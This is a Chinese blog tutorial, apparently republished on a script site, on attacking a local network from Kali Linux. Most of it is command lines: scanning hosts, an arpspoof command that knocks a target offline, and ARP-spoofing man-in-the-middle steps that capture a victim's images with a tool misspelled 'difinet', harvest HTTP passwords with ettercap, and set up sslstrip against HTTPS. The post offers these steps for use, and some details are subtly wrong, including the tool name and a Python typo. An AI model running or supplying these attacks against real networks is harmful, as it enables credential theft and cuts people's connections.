主頁 > 知識庫 > 一篇文章帶你了解kali局域網(wǎng)攻擊

一篇文章帶你了解kali局域網(wǎng)攻擊

熱門標(biāo)簽:湛江智能外呼系統(tǒng)廠家 百度地圖標(biāo)注沒有了 外呼并發(fā)線路 ai電銷機(jī)器人源碼 西藏房產(chǎn)智能外呼系統(tǒng)要多少錢 長沙高頻外呼系統(tǒng)原理是什么 ai電話機(jī)器人哪里好 宿遷星美防封電銷卡 地圖標(biāo)注審核表

前言

很久以前的博客才發(fā)現(xiàn),發(fā)布一下。
這個系列以后有時間再做。

arp攻擊

arp路由鏈表,感興趣的自行百度,我的博客我的筆記.

路由指向

介紹兩個東西.

echo 0 >/proc/sys/net/ipv4/ip_forward #讓經(jīng)過的數(shù)據(jù)不留通
echo 1 >/proc/sys/net/ipv4/ip_forward #讓數(shù)據(jù)流通

內(nèi)網(wǎng)掃描

這個在百度上你可以看到很多相關(guān)的方式,比如nmap fping

但是基本上掃描結(jié)果不太號,在虛擬機(jī)上你會發(fā)現(xiàn)你把主機(jī)的防火墻關(guān)了都掃不到主機(jī).

這里使用netdiscover
當(dāng)然這里也寫幾個nmap之類的指令

nmap -PR -sL ip
fping -asg ip
netdiscover -i kali網(wǎng)卡 -r ip(網(wǎng)段)
netdiscover -i eth0 -r 192.168.43.1/30

掃描速度是比較慢的

斷網(wǎng)攻擊

arpspoof -i kali的網(wǎng)卡 -t 目標(biāo)地址 目標(biāo)網(wǎng)卡
arpspoof -i eth0 -t 192.168.43.7 192.168.43.1

arp欺騙信息獲取

1.arpspoof -i eth0 -t 192.168.43.7 192.168.43.1 開始欺騙讓數(shù)據(jù)經(jīng)過你的電腦

2.echo 1 >/proc/sys/net/ipv4/ip_forward 放掉數(shù)據(jù)包

獲取圖片

使用工具difinet

difinet -i eth0(網(wǎng)卡)

實際操作:


圖片會在那里臨時保存


由于網(wǎng)絡(luò)問題可能會有點卡

獲取HTTP連接的密碼信息

使用ettercap

其他的操作還是一樣的,要開啟arp欺騙

ettercap -Tq -i eth0
-T 文本模式 q 安靜模式 i 網(wǎng)卡


然后等待即可.不過現(xiàn)在都是https,作用不大

出現(xiàn)中文怎么辦,直接賦值中文亂碼,之后解碼即可

百度搜索url解碼

或者直接使用python

中文編碼
from urllib.parse import quote,unquote
str1 = '中國'
str2=quote(strl)
print(str2)
解碼
print(unquote(str2))

獲取HTTPS的密碼信息

這個要先修改以下ettercap的配置文件.

vim /etc/ettercap/etter.conf

使用工具 sslstrip

那個吐槽一下 kali 2020是沒有sslstrip的原因是沒有安裝python2的pip 只有pip3

記住一定要先安裝python2

在kali里面python 默認(rèn)為python2 當(dāng)然你可以用ln -s 修改一下.

apt install python 這個時候會自動安裝python 2.7

然后輸入以下指令安裝sslstrip

git clone https://github.com/moxie0/sslstrip.git
cd sslstrip
python setup.py install 

這個是python2的,如果沒猜錯可能會遇到OpenSSL報錯說沒有這個模塊

pip install pyOpenSSL

總結(jié)

本篇文章就到這里了,希望能給你帶來幫助,也希望您能夠多多關(guān)注腳本之家的更多內(nèi)容!

您可能感興趣的文章:
  • kali安裝docker和portainer的配置方法
  • 最新超詳細(xì)虛擬機(jī)VMware安裝Kali Linux的圖文教程
  • Kali Linux安裝VMware tools安裝過程及VM安裝vmtools按鈕灰色
  • VMware kali虛擬機(jī)環(huán)境配置方法
  • 詳解kali linux 常用文件與指令路徑

標(biāo)簽:大同 寧夏 盤錦 普洱 漯河 海南 南平 林芝

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《一篇文章帶你了解kali局域網(wǎng)攻擊》,本文關(guān)鍵詞  一篇,文章,帶你,了解,kali,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《一篇文章帶你了解kali局域網(wǎng)攻擊》相關(guān)的同類信息!
  • 本頁收集關(guān)于一篇文章帶你了解kali局域網(wǎng)攻擊的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章